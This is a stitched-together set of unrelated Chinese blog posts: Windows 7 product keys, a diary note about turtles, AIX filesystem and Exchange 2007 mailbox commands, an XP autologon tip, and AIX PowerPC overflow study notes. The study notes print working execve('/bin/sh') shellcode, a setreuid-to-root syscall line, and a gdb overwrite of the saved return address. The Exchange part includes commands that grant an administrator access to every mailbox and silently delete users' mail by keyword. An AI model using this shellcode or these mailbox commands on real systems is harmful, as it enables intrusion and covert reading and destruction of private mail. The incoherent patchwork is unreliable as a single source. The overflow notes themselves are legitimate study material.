|
|
32位的五个key:
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY 64位的五个key:
JYDV8-H8VXG-74RPT-6BJPB-X42V4
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
482XP-6J9WR-4JXT3-VBPP6-FQF4M
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
7XRCQ-RPY28-YY9P8-R6HD8-84GH3 亲自激活了我的WIN7201就是如此激活的。不过,我仍然更换了一种激活方式。因为可以通过官方注册MSN帐号来获取激活序列号。 1. 打开这个连接: http://www.microsoft.com/windows/windows-7/beta-download.aspx ( 需要使用IE ) 2. 在“Get the download”处,选择 32位或64位 下载 3. 使用你的 Windows Live ID (MSN 账号) 登陆,并填写一些信息 4. 你就可以获得一个 Windows 7 序列号了 两只泥巴龟因老婆的怜悯,于2008年初从一小骗子商贩手中以高价买入,为的是放生. 可放家里几天从网上查询巴西龟太凶猛,外来生物,不可放生.这一养就是一年多.其间她养的时间比我要多.我也落得轻闲没有在意.最近照顾泥巴的工作却主要落在了我的身上.我想来想去.还是放了它吧,这样或许都能得到解脱.它们毕竟也是大自然的小生灵,不能束缚他们的自由,让他们进入到自然界接受挑战吧..... 昨天放假,开车去了仙湖.找一适合之地,小心地放入到湖中..... 
.文件系统类型: 日志型文件系统 (JFS):32位操作系统环境的文件系统
增强型日志文件系统(JFS2):64位操作系统的默认文件系统
网络文件系统(NFS):允许用户访问远程计算机上的系统
CD-ROM文件系统(CDRFS):
DVD-ROM文件系统(UDFS): 2.rootvg中的文件系统: AIX系统安装完成之后,rootvg中就存在7个日志型文件系统,分别是
root文件系统(/dev/hd4)、
proc文件系统、
usr文件系统(/dev/hd2)、
var文件系统(/dev/hd9var)、
home文件系统(/dev/hd1)、
tmp文件系统(dev/hd3)和
opt文件系统(/dev/hd10opt),这些文件系统都是在安装操作系统是创建的。 3.root文件系统中的内容
/etc目录,包含各种配置文件,一般用于系统管理,一部分链接到/usr/sbin的符号连接
/bin目录,包含着指向/usr/bin的符号链接
/sbin目录,包含着引导机器和安装/usr文件系统时所需的文件
/dev目录,包含着设备节点和本地设备的特殊文件
/tmp目录,位于逻辑卷/dev/hd3逻辑卷上,存放临时文件,须及时清理
/var目录,随着系统的运行而增大
/home目录,保存每一位用户的数据文件和目录
/usr目录,包含操作系统命令、程序和数据库,也可以共享给其他机器使用,位于/dev/hd2逻辑卷上
/lib目录,指向/usr/lib的符号链接
/tftpboot目录,用于引导无盘工作站(客户机)的引导映像和引导信息
/opt目录,位于/dev/hd10opt逻辑卷上,用于安装附加的应用程序软件包,也是AIX亲和linux的一部分 4.usr文件系统 /usr/bin目录
/usr/ccs目录
/usr/include目录
/usr/lbin目录
/usr/lib目录
/usr/lpp目录
/usr/sbin目录
/usr/share目录
/usr/adm目录
/usr/mail目录
/usr/news目录
/usr/preserve目录
/usr/spool/tmp目录
/usr/dict目录
/usr/man目录
/usr/lpd目录 5.操作文件系统 文件/etc/fiesystems存放着所有文件系统的信息 /lsfs 列出已经在系统中定义的各种文件系统
/mount 显示系统中已安装的文件系统
/df 检查文件系统的空间使用情况 -k以K计算 -m以M计算 -g以G计算
/du 显示文件大小 -k以K计算 -m以M计算 -g以G计算 #smit jfs jfs文件系统快捷菜单
#smit jfs2 jfs2文件系统快捷菜单
#smit mkjfs 在现有逻辑卷上建立文件系统 #smit crjfslvstd 创建jfs文件系统
#smit crjfs2lvstd 创建jfs2文件系统 #crfs -v jfs -g rootvg -m /test -a size=16M -a frag=512 -a nbpi=1024
创建16M的文件系统/temp, 碎片大小512k, i节点拥有1024个字节 #crfs -v jfs2 -g rootvg -m /test -a size=32768 -a agblksize=2048 -a logname=INLINE
创建一个文件系统/test, 拥有32768*512=16M空间 使用2048字节大小的块 #smit rmjfs
#rmfs -r -i Filesystem -r 删除安装点 -i需要确认 #smit chjfs 改变文件系统空间大小
#chfs -a size=150M /tmp 修改/tmp文件系统的大小为150M
#fsck #mount /allenfs
#mount /dev/lv01 /mnt
#mount all
#mount -a
#mount -r /allenfs 以只读方式挂载
#smit mountfs
#umount /allenfs
#umount /dev/hd01 故障解决: 无法卸载文件系统 #fuser /dev/cd0 查看哪个进程在使用光驱
/cdrom: 2910 3466
#kill -9 2910 3466 杀死进程然后再试着卸载 无法删除文件系统
#lsvg -l rootvg 若类型为???则用
#synclvodm -P rootvg
#syncvg -v rootvg 6.使用CDRFS和UDFS
#smit crcdrfs
#mount /cdrom
#umount /cdrom #startsrc -c cdromd 启动光驱管理进程 #cdcheck -m cd0 检查光驱里是否有介质被安装
#cdeject cd0 弹出光驱
#cdmount cd0 在cd0上安装一个文件系统
#cdumount cd0 在cd0上卸载文件系统 转自:峰行天下
永峰注:在许多客户使用Exchange中,均多次遇到需将服务器上的邮箱数据导出至PST文件的事例,始有此文。在早期版本的Exchange中,我们可以使用exmerge工具来完成pst文件的导出工作,而在现在的Exchange 2007中,这项工作由强大的powershell来代替,你只需输入简单的一条命令,就可完成邮箱数据的导入与导出。 在导入与导出邮箱数据之前,我们需先了解她的先决条件: 1.不能在64bit的Exchange Server上执行本文所涉及的Powershell命令,需要在同域中的一个 XP SP2或Vista客户端安装Exchange管理工具。 如下图描述: 
2.执行本文所涉及PowerShell命令的机器上必需安装Outlook 2003 SP2或更高版本。 否则将出现以下错误: 
3. 本文所涉及命令需在Exchange 2007 sp1下执行,因为未安装sp1将不支持 -pstfolderpath参数及import-mailbox命令(在help文档中也未查到) OK,了解这些后,我们需要在一台32位的客户端或服务器上安装好Exchange 管理工具,并且安装好Outlook 2003 sp2以上版本。安装Exchange 管理工具很简单,只需在客户端执行setup.exe后,选择”管理工具”即可。准备好这些后,接着就可以使用以下命令来导入、导出邮箱数据。 从邮箱数据库导出邮件至PST文件 Export-mailbox -Identity <邮箱别名> -PSTFolderpath <导出pst文件存放位置> enter后,输入”Y” 示例如下图: 
如果需要批量导出一个数据库中的所有邮件,可以使用管道筛选: Get-mailbox -database exchangeserver\db1 | export-mailbox -PSTFolderPath e:\pst 或: Get-user | export-mailbox -PSTFolderPath e:\pst 命令将自动在e:\pst目录下生成由邮箱别名为文件名的pst文件。 同时请注意以下几点: 1. 使用Export-mailbox导出邮件后,源数据不会被删除,除非有带-DeleteContent参数。 2. 无法将数据从恢复存储组 (RSG) 中的邮箱导出到 .pst 文件。 3. 无法从公用文件夹数据库导出数据。 从pst文件导入至邮箱数据库 要想从一个PST文件中导入邮件至Exchange 2007数据库,可使用以下命令: Import-mailbox -Identity <邮箱别名> -PSTFolderPath <pst文件路径> 如: Import-mailbox -Identity user2 -PSTFolderPath e:\pst\user2.pst 另外,如需批量导入,同样使用管道,提前将以邮箱别名命名的pst文件放在e:\pst文件夹下。 Get-Mailbox -database exchangeserver\db1 | Import-mailbox -PSTFolderPath e:\pst 同时请注意以下几点: 1. 无法使用 Import-Mailbox cmdlet 将数据从 .pst 文件导入到恢复存储组 (RSG) 上的邮箱。 2.无法使用 Import-Mailbox cmdlet 将数据导入到公用文件夹数据库。 3.使用Import-Mailbox 从pst文件只能导入至Exchange 2007的邮箱中,其它版本需使用Microsoft Exchange Server 邮箱合并向导 (ExMerge.exe)。 以下URL可查看关于本文的一个video: http://www.msexchange.org/player.asp?1370845155 附其他有价值的PS命令: - Get-mailbox | Add-MailboxPermission -User administrator -AccessRights Fullaccess
- Get-mailbox | Remove-MailboxPermission -User administrator -AccessRights Fullaccess
- 然后以administrator的身份登录OWA,建立一个文件夹,名字随便取。我这里命名为“垃圾回收站”
- Get-Mailbox –Database "Mailbox Database" | Export-Mailbox -SubjectKeywords "艳照门" -TargetMailbox administrator@winos.cn -TargetFolder "垃圾回收站" –DeleteContent
- Get-Mailbox –Database "Mailbox Database" | Export-Mailbox -ContentKeywords "加薪" -TargetMailbox administrator@winos.cn -TargetFolder "垃圾回收站" -DeleteContent
如果你给你的XP设置了密码,那么每次在进入XP桌面之前,都会出现一个用户登录界面,要求输入密码,这样加大了系统的安全性,也为多人共用一台电脑提供了方便,但如果只有你一个人使用,这样每次要输入密码,的确有点不大方便。要取消这个登录步骤,有两种方法: 第一种是修改注册表 这种方法比较麻烦,而且要求对注册表有一定的了解。 第1步:运行注册表编辑器,依次展开 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 分支,然后在右侧窗口双击 "DefaultUserName",接着输入你的登录用户名。如果没有 "DefaultUserName" 这一项,可以按鼠标右键选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目,注意要区分大小写字母。 第2步:同样在该分支下,在右侧窗口中双击 "DefaultPassword",然后在空白栏内输入你的密码。假如未发现 "DefaultPassword" 这一项,可按上面的步骤来新建该字符串值。 第3步:接下来在右侧窗口中双击 "AutoAdminLogon",将数值设置为 "1"。假如未发现 "AutoAdminLogon" 这一项,可按上面的步骤来新建。 现在关闭注册表编辑器并重新启动电脑,就可以实现XP的自动登录了。 第二种方法比较简单 在 Windows XP 中单击“开始→运行”,输入 “rundll32 netplwiz.dll,UsersRunDll” 或者 "control userpasswords2"(注意大小写及空格),按回车就会出现一个“用户账户”的操作窗口,如果你对 Windows 2000 比较熟悉的话,相信你应该知道怎么做了,取消对“要使用本机,用户必须输入用户名和密码”项的选择,点击“应用”。在接下来弹出的对话框中输入你想让电脑每次自动登录的用户名及其密码,下次启动时就可以实现XP的自动登录了。 事实上,在Windows 2000中也可以这样实现自动登录,不过它可以通过“控制面板”打开“用户账户”窗口,而在Windows XP中不行罢了。 AIX PowerPC体系结构及其溢出技术学习笔记
[quote][/quote]一、熟悉PowerPC体系及其精简指令集计算
PowerPC体系结构是RISC(精简指令集计算),定义了 200 多条指令。PowerPC 之所以是 RISC,原因在于大部分指令在一个单一的周期内执行,而且是定长的32位指令,通常只执行一个单一的操作(比如将内存加载到寄存器,或者将寄存器数据存储到内存)。差不多有12种指令格式,表现为5类主要的指令:
1、分支(branch)指令
2、定点(fixed-point)指令
3、浮点(floating-point)指令
4、装载和存储指令
5、处理器控制指令
PowerPC的应用级寄存器分为三类:通用寄存器(general-purpose register,GPR)、浮点寄存器(floating-point register [FPR] 和浮点状态与控制寄存器 [Floating-Point Status and Control Register,FPSCR])和专用寄存器(special-purpose register,SPR)。gdb里的info registers能看到38个寄存器,下面主要介绍这几个常用的寄存器:
通用寄存器的用途:
r0 在函数开始(function prologs)时使用。
r1 堆栈指针,相当于ia32架构中的esp寄存器,idapro把这个寄存器反汇编标识为sp。
r2 内容表(toc)指针,idapro把这个寄存器反汇编标识为rtoc。系统调用时,它包含系统调用号。
r3 作为第一个参数和返回地址。
r4-r10 函数或系统调用开始的参数。
r11 用在指针的调用和当作一些语言的环境指针。
r12 它用在异常处理和glink(动态连接器)代码。
r13 保留作为系统线程ID。
r14-r31 作为本地变量,非易失性。
专用寄存器的用途:
lr 链接寄存器,它用来存放函数调用结束处的返回地址。
ctr 计数寄存器,它用来当作循环计数器,会随特定转移操作而递减。
xer 定点异常寄存器,存放整数运算操作的进位以及溢出信息。
msr 机器状态寄存器,用来配置微处理器的设定。
cr 条件寄存器,它分成8个4位字段,cr0-cr7,它反映了某个算法操作的结果并且提供条件分支的机制。
寄存器r1、r14-r31是非易失性的,这意味着它们的值在函数调用过程保持不变。寄存器r2也算非易失性,但是只有在调用函数在调用后必须恢复它的值时才被处理。
寄存器r0、r3-r12和特殊寄存器lr、ctr、xer、fpscr是易失性的,它们的值在函数调用过程中会发生变化。此外寄存器r0、r2、r11和r12可能会被交叉模块调用改变,所以函数在调用的时候不能采用它们的值。
条件代码寄存器字段cr0、cr1、cr5、cr6和cr7是易失性的。cr2、cr3和cr4是非易失性的,函数如果要改变它们必须保存并恢复这些字段。
在AIX上,svca指令(sc是PowerPC的助记符)用来表示系统调用,r2寄存器指定系统调用号,r3-r10寄存器是给该系统调用的参数。在执行系统调用指令之前有两个额外的先决条件:LR寄存器必须保存返回系统调用地址的值并且在系统调用前执行crorc cr6, cr6, cr6指令。
二、学习AIX PowerPC汇编
由于对AIX PowerPC的汇编很不熟,所以借助gcc的-S来学习一下AIX的汇编。二进制的gcc可以从http://aixpdslib.seas.ucla.edu/下载到。先写一个最小的C程序:
/* setuid.c
*
* Learn AIX PowerPC assemble
*/
#include <unistd.h>
int main()
{
setuid(0);
}
用gcc的-S选项编译一下:
bash-2.04$ gcc -S setuid.c
在当前目录得到setuid.s:
.file "setuid.c"
.toc
.csect .text[PR]
gcc2_compiled.:
__gnu_compiled_c:
.align 2
.globl main
.globl .main
.csect main[DS]
main:
.long .main, TOC[tc0], 0
.csect .text[PR]
.main:
.extern __mulh
.extern __mull
.extern __divss
.extern __divus
.extern __quoss
.extern __quous
mflr 0
stw 31,-4(1)
stw 0,8(1)
stwu 1,-64(1)
mr 31,1
bl .__main
cror 31,31,31
li 3,0
bl .setuid
cror 31,31,31
L..2:
lwz 1,0(1)
lwz 0,8(1)
mtlr 0
lwz 31,-4(1)
blr
LT..main:
.long 0
.byte 0,0,32,97,128,1,0,1
.long LT..main-.main
.short 4
.byte "main"
.byte 31
_section_.text:
.csect .data[RW],3
.long _section_.text
经过精简,发现如下这样的格式就足够了:
.globl .main
.csect .text[PR]
.main:
mflr 0
stw 31,-4(1)
stw 0,8(1)
stwu 1,-64(1)
mr 31,1
bl .__main
cror 31,31,31
li 3,0
bl .setuid
cror 31,31,31
L..2:
lwz 1,0(1)
lwz 0,8(1)
mtlr 0
lwz 31,-4(1)
blr
三、学习AIX PowerPC的shellcode
B-r00t的PowerPC/OS X (Darwin) Shellcode Assembly写的非常通俗易懂,只可惜是OS X系统,不过现在我们也可以依样画葫芦了:
bash-2.04$ cat simple_execve.s
.globl .main
.csect .text[PR]
.main:
xor. %r5, %r5, %r5 # 把r5寄存器清空,并且在cr寄存器设置相等标志
bnel .main # 如果没有相等标志就进入分支并且把返回地址保存到lr寄存器,这里不会陷入死循环
mflr %r3 # 等价于mfspr r3, 8,把lr寄存器的值拷贝到r3。这里r3寄存器的值就是这条指令的地址
addi %r3, %r3, 32 # 上一条指令到/bin/sh字符串有8条指令,现在r3是/bin/sh字符串开始的地址
stw %r3, -8(%r1) # argv[0] = string 把r3写入堆栈
stw %r5, -4(%r1) # argv[1] = NULL 把0写入堆栈
subi %r4, %r1, 8 # r4指向argv[]
li %r2, 3 # AIX 4.3的execve中断号是3
crorc %cr6, %cr6, %cr6 # 这个环境不加这条指令也能成功,lsd和IBM Aix PowerPC Assembler的svc指令介绍都提到成功执行系统调用的前提是一个无条件的分支或CR指令。这条指令确保是CR指令。
svca 0 # execve(r3, r4, r5)
string: # execve(path, argv[], NULL)
.asciz "/bin/sh"
bash-2.04$ gcc -o simple_execve simple_execve.s
bash-2.04$ ./simple_execve
$
正确执行了execve,用objdump查看一下它的opcode:
bash-2.04$ objdump -d simple_execve|more
0000000010000308 <.main>:
10000308: 7c a5 2a 79 xor. r5,r5,r5
1000030c: 40 82 ff fd bnel 10000308 <.main>
10000310: 7c 68 02 a6 mflr r3
10000314: 38 63 00 20 cal r3,32(r3)
10000318: 90 61 ff f8 st r3,-8(r1)
1000031c: 90 a1 ff fc st r5,-4(r1)
10000320: 38 81 ff f8 cal r4,-8(r1)
10000324: 38 40 00 03 lil r2,3
10000328: 4c c6 33 42 crorc 6,6,6
1000032c: 44 00 00 02 svca 0
10000330: 2f 62 69 6e cmpi 6,r2,26990
10000334: 2f 73 68 00 cmpi 6,r19,26624
可以看到有好几条指令的opcode包含了0,这对于strcpy等字符串操作函数导致的溢出会被截断,所以需要编码或者相应指令的替换。不过我们注意到svca指令中间两个字节包含了0,幸好这两个字节是保留字段,并没有被使用,可以用非0字节代替。PowerPC空指令nop的opcode是0x60000000,后面三个字节的0也是保留项,也可以用0x60606060来代替。lsd提供了一个可用的shellcode:
/* shellcode.c
*
* ripped from lsd
*/
char shellcode[] = /* 12*4+8 bytes */
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x03"
;
int main(void)
{
int jump[2]={(int)shellcode,0};
((*(void (*)())jump)());
}
编译后,用IDAPro反汇编,在Names window点击shellcode,并且按c强制反汇编:
.data:200006D8 shellcode: # CODE XREF: .data:200006DCp
.data:200006D8 # DATA XREF: .data:shellcode_TCo
.data:200006D8 7C A5 2A 79 xor. r5, r5, r5 # 把r5寄存器清空,并且在cr寄存器设置相等标志
.data:200006DC 40 82 FF FD bnel shellcode # 如果没有相等标志就进入分支并且把返回地址保存到lr寄存器,这里不会陷入死循环
.data:200006E0 7F E8 02 A6 mflr r31 # 等价于mfspr r31, 8,这里把lr寄存器的值拷贝到r31
.data:200006E4 3B FF 01 20 addi r31, r31, 0x120 # r31等于.data:20000800
.data:200006E8 38 7F FF 08 subi r3, r31, 0xF8 # r3等于.data:20000708
.data:200006EC 38 9F FF 10 subi r4, r31, 0xF0 # r4等于.data:20000710
.data:200006F0 90 7F FF 10 stw r3, -0xF0(r31) # 把地址.data:20000708放到.data:20000710
.data:200006F4 90 BF FF 14 stw r5, -0xEC(r31) # 把0放到.data:20000714
.data:200006F8 88 5F FF 0F lbz rtoc, -0xF1(r31) # 读入execve的中断号到r2寄存器
.data:200006FC 98 BF FF 0F stb r5, -0xF1(r31) # .data:2000070F写入一个字节0
.data:20000700 4C C6 33 42 crorc 4*cr1+eq, 4*cr1+eq, 4*cr1+eq # Condition Register OR with Comlement
.data:20000700 # 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.data:20000704 44 .byte 0x44 # execve(r3, r4, r5)
.data:20000705 FF .byte 0xFF # execve(path, argv[], NULL)
.data:20000706 FF .byte 0xFF
.data:20000707 02 .byte 2
.data:20000708 2F .byte 0x2F # /
.data:20000709 62 .byte 0x62 # b
.data:2000070A 69 .byte 0x69 # i
.data:2000070B 6E .byte 0x6E # n
.data:2000070C 2F .byte 0x2F # /
.data:2000070D 73 .byte 0x73 # s
.data:2000070E 68 .byte 0x68 # h
.data:2000070F 03 .byte 3
至此,我们了解了AIX PowerPC下如何简单的调试shellcode。有一个很大的问题,AIX的各系统调用号随系统版本不断变化,这给写通用shellcode造成很大的困难,watercloud整理过各系统版本一部分系统调用号[7]:
Aix5.1 seteuid 0xb6 setreuid 0xb7 execve 0x5
Aix4.3 seteuid 0x92 setreuid 0x96 execve 0x3
Aix4.3.3 seteuid 0x92/0x93 setuid 0x93/0x94 setreuid 0x96/0x97 execve 0x4/0x3
Aix4.2 setuid 0x71 execve 0x2
Aix4.3 setregid: ??
Aix4.3.3 setregid: 248/247
Aix5.1 setregid: ??
Aix5.2 execve: ?? setreuid: ?? setregid: ??
这个表并不是很全,有环境的朋友可以继续修改补全。另外Aix提供了一个syscall命令,如果我们拿到了euid=0就权限可以这样使得uid=0了:
/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh"
四、学习AIX PowerPC的溢出技术
要学习溢出技术就必须了解堆栈结构,PowerPC的堆栈结构和ia32有很大不同,PowerPC没有类似ia32里ebp这个指针,它只使用r1寄存器把整个堆栈构成一个单向链表,其增长方向是从高地址到低地址,而本地变量的增长方向也是从低地址到高地址的,这就给溢出获得控制的技术提供了保证。32位PowerPC的堆栈结构如下图:
. 调用前的堆栈 . . 调用后的堆栈 .
. . . .
| | | |
+----------------+- +----------------+-
| Parameter area | | | Parameter area | |
+----------------+ +-调用函数 +----------------+ +-调用函数
| Linkage area | | | Linkage area | |
SP --->+----------------+- +----------------+-
| 堆栈增长方向 | | Saved registers| |
. | . +----------------+ |
. v . | Local variables| |
+----------------+ +-被调函数
| Parameter area | |
+----------------+ |
| Linkage area | |
SP --->+----------------+-
| 堆栈增长方向 |
. | .
. v .
每个PowerPC的栈帧数据包含4个部分:链接区、参数区、本地变量和寄存器区。
链接区保存了被调函数和调用函数的一些值,它的结构如下:
+24+----------------+
| Saved TOC |
+20+----------------+
| Reserved |
+16+----------------+
| Reserved |
+12+----------------+
| Saved LR |
+8+----------------+
| Saved CR |
+4+----------------+
| Saved SP |
SP --->+----------------+
被调函数的链接寄存器(LR)保存到8(SP)。
被调函数可能把条件寄存器(CR)保存到4(SP),如果链接寄存器已经保存,这也就没有必要了。
堆栈指针永远保存调用函数的栈帧,这样被调函数就可以找到调用函数的参数区,不过这也意味着PowerPC不可能有push和pop这样对堆栈的操作。
全局链接代码会把TOC指针保存到20(SP)的地方。
参数区用来传递其它被调函数的参数。当前函数的参数是通过上一函数(调用者)的参数区和被设计用来传递参数的通用寄存器中获取。
如果本地变量太多,无法在非易失性寄存器中存放,那么就会使用基于堆栈的本地变量。它的大小在编译的时候确定,是不可修改的。
寄存器区包含非易失性寄存器的值。当被调函数使用这些寄存器作为本地变量,而调用函数可能会用到同样的寄存器,那么这些寄存器的信息需要在调用函数修改它们之前保存。当然,被调函数返回的时候需要恢复这些寄存器的值。
ia32中当函数返回时,一般都有如下三条指令:
mov esp,ebp ; 堆栈指针esp指向前一个栈帧
pop ebp
ret ; 执行esp+4保存的返回地址
AIX PowerPC中当函数返回时,一般有如下几条指令:
lwz r1,0(r1) # 堆栈指针r1指向前一个栈帧
lwz r0,8(r1) # r0等于堆栈里保存的lr值
mtlr r0 # lr=r0
lwz r31,-4(r1) #
blr # 跳到lr执行
可以看到虽然AIX PowerPC的堆栈结构和ia32的不同,但是溢出技术的手法是一样的。ia32是覆盖当前ebp+4保存的返回地址,当函数返回的时候就会跳到我们指定的地址执行;AIX PowerPC要覆盖到下一个栈帧保存lr的地址,当函数返回的时候也会跳到我们指定的地址执行。
文字描述无法实际理解,自己动手一下才会真正领会,下面用一个简单的程序走一遍流程:
bash-2.04$ cat simple_overflow.c
/* simple_overflow.c
*
* Simple program to demonstrate buffer overflows
* on the PowerPC architecture.
*/
#include <stdio.h>
#include <string.h>
char largebuff[] =
"1234512345123456=PRESERVEDSPACE=ABCD";
int main (void)
{
char smallbuff[16];
strcpy (smallbuff, largebuff);
}
bash-2.04$ gcc -o simple_overflow simple_overflow.c
bash-2.04$ gdb simple_overflow
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.2.0"...
(gdb) r
Starting program: /home/san/simple_overflow
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? () from (unknown load module)
(gdb) i reg
r0 0x41424344 1094861636
r1 0x2ff22ba0 804400032
r2 0x20000790 536872848
r3 0x2ff22b88 804400008
r4 0x20000734 536872756
r5 0x2ff22bac 804400044
r6 0x0 0
r7 0x0 0
r8 0x0 0
r9 0x80808080 -2139062144
r10 0x7f7f7f7f 2139062143
r11 0x4 4
r12 0x80808080 -2139062144
r13 0xdeadbeef -559038737
r14 0x1 1
r15 0x2ff22be8 804400104
r16 0x2ff22bf0 804400112
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0xdeadbeef -559038737
r29 0xdeadbeef -559038737
r30 0xdeadbeef -559038737
r31 0x53455256 1397051990
pc 0x41424344 1094861636
ps 0x4000d030 1073795120
cr 0x22222242 572662338
lr 0x41424344 1094861636
ctr 0x4 4
xer 0x0 0
pc寄存器已经被覆盖为ABCD,跟着程序一步步走走,看看pc是怎么变为ABCD的:
(gdb) disas main
Dump of assembler code for function main:
0x10000308 <main>: mflr r0
0x1000030c <main+4>: stw r31,-4(r1)
0x10000310 <main+8>: stw r0,8(r1)
0x10000314 <main+12>: stwu r1,-80(r1)
0x10000318 <main+16>: mr r31,r1
0x1000031c <main+20>: bl 0x100004c8 <__main>
0x10000320 <main+24>: crmove 4*cr7+so,4*cr7+so
0x10000324 <main+28>: addi r3,r31,56
0x10000328 <main+32>: lwz r4,32(r2)
0x1000032c <main+36>: bl 0x10000520 <text+4>
0x10000330 <main+40>: crmove 4*cr7+so,4*cr7+so
0x10000334 <main+44>: lwz r1,0(r1)
0x10000338 <main+48>: lwz r0,8(r1)
0x1000033c <main+52>: mtlr r0
0x10000340 <main+56>: lwz r31,-4(r1)
0x10000344 <main+60>: blr
0x10000348 <main+64>: .long 0x0
0x1000034c <main+68>: .long 0x2061
0x10000350 <main+72>: lwz r0,1(r1)
0x10000354 <main+76>: .long 0x40
0x10000358 <main+80>: .long 0x46d61
0x1000035c <main+84>: xori r14,r11,7936
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x1000031c
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/simple_overflow
Breakpoint 1, 0x1000031c in main ()
(gdb) display/i $pc
1: x/i $pc 0x1000031c <main+20>: bl 0x100004c8 <__main>
(gdb) ni
0x10000320 in main ()
1: x/i $pc 0x10000320 <main+24>: crmove 4*cr7+so,4*cr7+so
(gdb) x/20x $r1
0x2ff22b50: 0x2ff22ba0 0x00000000 0x10000320 0x00000000
0x2ff22b60: 0x2ff22ba0 0x00000000 0x00000000 0x00000000
0x2ff22b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b90: 0x00000000 0x00000000 0x00000000 0xdeadbeef
(gdb)
0x2ff22ba0: 0x00000000 0x00000000 0x100001cc 0x00000000
0x2ff22bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be0: 0x00000000 0x00000000 0x2ff22c70 0x00000000
(gdb) bt
#0 0x10000320 in main ()
#1 0x100001cc in __start ()
0x2ff22b50是当前的堆栈指针,它指向的地址是前一个栈帧。从堆栈回溯或堆栈内容来看,前一个栈帧保存的lr是0x100001cc,也就是说main函数退出后会执行到这个地址,先来看程序流程:
(gdb) until *0x10000330
0x10000330 in main ()
2: x/i $pc 0x10000330 <main+40>: crmove 4*cr7+so,4*cr7+so
(gdb) i reg
r0 0x20 32
r1 0x2ff22b50 804399952
r2 0x20000790 536872848
r3 0x2ff22b88 804400008
r4 0x20000734 536872756
r5 0x2ff22bac 804400044
r6 0x0 0
r7 0x0 0
r8 0x0 0
r9 0x80808080 -2139062144
r10 0x7f7f7f7f 2139062143
r11 0x4 4
r12 0x80808080 -2139062144
r13 0xdeadbeef -559038737
r14 0x1 1
r15 0x2ff22be8 804400104
r16 0x2ff22bf0 804400112
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0xdeadbeef -559038737
r29 0xdeadbeef -559038737
r30 0xdeadbeef -559038737
r31 0x2ff22b50 804399952
pc 0x10000330 268436272
ps 0x2d030 184368
cr 0x22222242 572662338
lr 0x10000330 268436272
ctr 0x4 4
xer 0x0 0
(gdb) x/20x $r1
0x2ff22b50: 0x2ff22ba0 0x00000000 0x10000320 0x00000000
0x2ff22b60: 0x2ff22ba0 0x00000000 0x00000000 0x00000000
0x2ff22b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b80: 0x00000000 0x00000000 0x31323334 0x35313233
0x2ff22b90: 0x34353132 0x33343536 0x3d505245 0x53455256
(gdb)
0x2ff22ba0: 0x45445350 0x4143453d 0x41424344 0x00000000
0x2ff22bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22be0: 0x00000000 0x00000000 0x2ff22c70 0x00000000
strcpy已经完成,前一个栈帧保存lr寄存器的内容已经改写成0x41424344,接着看程序流程:
(gdb) ni
0x10000334 in main ()
2: x/i $pc 0x10000334 <main+44>: lwz r1,0(r1)
(gdb)
0x10000338 in main ()
2: x/i $pc 0x10000338 <main+48>: lwz r0,8(r1)
(gdb)
0x1000033c in main ()
2: x/i $pc 0x1000033c <main+52>: mtlr r0
(gdb)
0x10000340 in main ()
2: x/i $pc 0x10000340 <main+56>: lwz r31,-4(r1)
(gdb)
0x10000344 in main ()
2: x/i $pc 0x10000344 <main+60>: blr
(gdb)
Cannot access memory at address 0x41424344
0x10000344 in main ()
2: x/i $pc 0x10000344 <main+60>: blr
